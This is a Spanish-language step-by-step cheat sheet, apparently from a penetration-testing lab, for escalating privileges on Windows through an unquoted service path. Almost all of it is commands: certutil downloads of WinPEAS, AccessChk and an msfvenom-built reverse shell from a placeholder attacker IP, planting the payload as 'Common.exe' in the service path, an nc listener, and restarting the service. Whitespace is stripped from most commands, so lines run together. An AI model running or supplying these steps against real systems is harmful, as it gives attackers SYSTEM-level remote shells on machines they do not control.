# Transferencia de WinPEAS## Máquina atacantemd5sumwinpeas.exe; python3-mhttp.server80## Máquina victimacertutil.exe-urlcache-fhttp://<attacker-IP-address>:80/winpeas.exewinpeas.exe&certutil.exe-hashfilewinpeas.exeMD5# Transferencia de AccessChk## Máquina atacantemd5sumaccesschk.exe; python3-mhttp.server80## Máquina victimacertutil.exe-urlcache-fhttp://<attacker-IP-address>:80/accesschk.exeaccesschk.exe&certutil.exe-hashfileaccesschk.exeMD5# Enumeración de servicios con WinPEAS.\winpeas.exequietservicesinfo# Enumeración de privilegios del servicio con AccessChk (SERVICE_CHANGE_CONFIG).\accesschk.exe/accepteula-ucqvuser<service-name># Revisión de privilegios de ejecución del servicio (SERVICE_START_NAME) y ruta del servicio sin comillas (BINARY_PATH_NAME)## SERVICE_START_NAME: LocalSystemscqc<service-name>
Revisión de permisos de escritura en ruta de directorios del servicio
Privilegios: BUILTIN\Users
Ruta del servicio: C:\Program Files\Unquoted Path Service\Common Files\service.exe
# Generación y transferencia de reverse shell## Máquina atacantemsfvenom-pwindows/x64/shell_reverse_tcpLHOST=<attacker-IP-address>LPORT=443-fexe-oreverse.exemd5sumreverse.exe; python3-mhttp.server80## Máquina victimacertutil.exe-urlcache-fhttp://<attacker-IP-address>:80/reverse.exereverse.exe&certutil.exe-hashfilereverse.exeMD5# Copia de reverse shell a ruta del servicio## Ruta original del servicio: C:\Program Files\Unquoted Path Service\Common Files\service.execopyreverse.exe"C:\Program Files\Unquoted Path Service\Common.exe"# Configuración de listener de reverse shell en máquina atacanterlwrapnc-lvnp443# Inicio del servicionetstart<service-name>